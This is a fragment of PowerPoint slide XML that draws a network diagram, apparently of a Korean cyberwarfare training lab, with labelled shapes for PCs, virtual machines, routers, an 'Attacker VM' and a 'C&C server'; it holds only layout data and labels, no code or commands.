                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C243831C-CCED-4624-92B0-30413D52F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 name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3DBCE3D-038F-4313-B2CD-894935DB4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1" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30653281-FD19-482F-9E78-ADBBB109A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2" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BFE0D1E-C939-4266-A2FC-CEAE660A5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3" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A290837B-894D-4427-8908-25ADC087A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4" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AF3C39E-3F5C-4CF9-BDD5-E3A525550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5" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F255358-2FC9-4A26-9EB2-3F15E0E93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6" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C994ACE-0367-4266-B1A3-945E7CBD4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7" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6470E3D-C2C7-4636-8E22-E62E2A05A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8" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532400BB-27E6-432B-B475-C73E1F938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9" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74037588-0DA4-4996-BEB6-915A7D7D3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2" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04AE7A01-5A54-4FE0-B416-84FCA9BC4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3" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AAC1297-811D-4E73-8BE0-EB604E4A1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4" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99FD480-903B-4A69-B3C3-A3073A38D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5" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AE2B13E-4195-42E3-A0A3-2C7442E50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6" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2A1BA0C-5663-40FF-9876-4B999430D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7" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D743EF7C-64B3-4FB7-B35B-EA7B873C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0" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF4B45EF-2AB1-4A4B-8444-50CEBA75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2" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8565F60-1FA0-4D97-B331-487DD48D7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9" name="연결선: 꺾임 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0A182AE-0F92-46F0-873F-7D2CE3C0F3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="1026" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1968694" y="3593728"/>
            <a:ext cx="490994" cy="4047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id="{171141DB-19CD-40CB-B78C-A8992C787942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="29" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2373400" y="3593795"/>
            <a:ext cx="490994" cy="40463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E988029D-CE79-40D4-B1E9-8E3C811FC49A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2778107" y="3189088"/>
            <a:ext cx="490994" cy="121405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DD3996AC-62D9-4892-969F-DD81D9B591AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3182814" y="2784381"/>
            <a:ext cx="490994" cy="202346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CFE981E3-5A11-45C4-A540-E4272A884E8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3589855" y="2377341"/>
            <a:ext cx="490994" cy="2837548"/>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067D4DFC-03B7-4E9F-A3C5-6D8716AFA9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1026" idx="2"/>
            <a:endCxn id="33" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011803"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02D21BA7-FEC7-4CEA-ABAE-BC965AFA0C3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821217"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E1B36E02-FBED-4833-A691-6BBDB80EE761}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="2"/>
            <a:endCxn id="35" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630631"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D092049C-FEB2-463E-BFBF-0C5D4F2C7C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="36" idx="0"/>
            <a:endCxn id="31" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4440045"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54CA44FA-EA07-4288-8010-DAE930860227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
            <a:endCxn id="37" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254126"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DB1DCA20-A9A1-4055-BEEA-4A98B5FFCC2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="38" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011803"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80601D3E-2E99-46BC-B28D-3586DCB95BC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="39" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821217"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B572B435-C779-4E8D-912F-64227CE9FE2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="42" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630631"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60FEF451-FF11-4894-A503-C1BBB0983A44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4440045"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EBFC1452-6237-4736-8584-1038A6DFEDC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="44" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254126"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96774D60-2265-4C11-9680-EC1F7D016FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="38" idx="2"/>
            <a:endCxn id="45" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011803"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id="{A6FF0022-EDD7-4120-880B-D9389BB6FAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="39" idx="2"/>
            <a:endCxn id="46" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821217"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7A42C1D1-4E05-46B4-A825-5DC834B96833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="47" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630631"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7DF946AA-36CE-45CA-AD42-E05CD77F587B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="43" idx="2"/>
            <a:endCxn id="50" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4440045"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3A15B2A7-3EC3-4415-8118-61617C1FCCE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="44" idx="2"/>
            <a:endCxn id="52" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254126"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B3F5DA4E-E589-44C0-9AFF-4FCD5EC5543A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511792" y="2081652"/>
            <a:ext cx="2066517" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>사이버전 실습실</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0F0F892-109F-49BD-A928-EAAD6D087AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2000212" y="2440307"/>
            <a:ext cx="832733" cy="11103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9" name="Picture 4" descr="노트북 이모티콘 💻">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4210117A-FD74-4096-9158-41E5582AB0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304" r="2479"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7898048" y="2846797"/>
            <a:ext cx="1191320" cy="8921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가상머신에 윈도우7 설치하기! - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CAB48A-F59F-4B69-BE10-55E224D4F4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3649594" y="2505954"/>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8" descr="라우터 다이어그램 아이콘 벡터 드로잉 | 공용 도메인 벡터">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACAE4728-91AE-4605-AECA-E2829A04A5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2799681"/>
            <a:ext cx="340590" cy="250893"/>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6" descr="가상머신에 윈도우7 설치하기! - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAF7F9C-EF5F-4D9E-AD97-253DA233237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2493933"/>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가상머신에 윈도우7 설치하기! - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF30A985-5860-4876-956E-4A6FB6DEA7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3165762"/>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8" descr="라우터 다이어그램 아이콘 벡터 드로잉 | 공용 도메인 벡터">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23BBCD0E-15A4-4BBE-B5A8-0B0737EC1D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3133254"/>
            <a:ext cx="340590" cy="250893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1052" name="직선 연결선 1051">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F971BEC-A815-4FE5-9476-7B9E7B56A0C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1030" idx="2"/>
            <a:endCxn id="1050" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819889" y="2795210"/>
            <a:ext cx="335164" cy="129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직선 연결선 186">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA44BA2C-4C73-4FD0-8594-15DECE2D6F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1050" idx="2"/>
            <a:endCxn id="184" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4325348" y="3050574"/>
            <a:ext cx="0" cy="82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직선 연결선 189">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B592736-3960-4BE0-AF94-0FAEABF5595B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="184" idx="3"/>
            <a:endCxn id="183" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495643" y="3258701"/>
            <a:ext cx="238702" cy="51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id="{79A6ECD4-54AC-42A6-9121-01B4F48A6021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1050" idx="3"/>
            <a:endCxn id="182" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4495643" y="2783189"/>
            <a:ext cx="408997" cy="141939"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="화살표: 오른쪽 1070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47523657-EAB1-4F53-B475-13A8B721FDC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3134433" y="2884907"/>
            <a:ext cx="170282" cy="125447"/>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2" name="TextBox 1071">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB437163-D861-4E48-B602-EFB3C8ACA03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360193" y="2029162"/>
            <a:ext cx="919391"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1074" name="직선 화살표 연결선 1073">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5918C44C-84BB-4D97-B635-BED267378DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1072" idx="2"/>
            <a:endCxn id="1030" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819889" y="2275383"/>
            <a:ext cx="0" cy="23057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CAC1C278-4026-409F-8424-14E062B4BAAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4423908" y="3579815"/>
            <a:ext cx="975028" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="TextBox 220">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CF3A042-A706-4939-AFB9-D635448EA4F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4447937" y="2022462"/>
            <a:ext cx="919391" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>C&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>C server</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="222" name="직선 화살표 연결선 221">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09DBF391-D859-44D0-8B26-A80332390C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="221" idx="2"/>
            <a:endCxn id="182" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4904640" y="2268683"/>
            <a:ext cx="2993" cy="22525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직선 화살표 연결선 224">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{339AE3EC-0296-4FB1-A105-FB19A9DAABE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="220" idx="0"/>
            <a:endCxn id="183" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4904640" y="3455018"/>
            <a:ext cx="6782" cy="12479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8E64A489-8668-4D5E-A711-B7A96D168BF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360193" y="3121215"/>
            <a:ext cx="719330" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
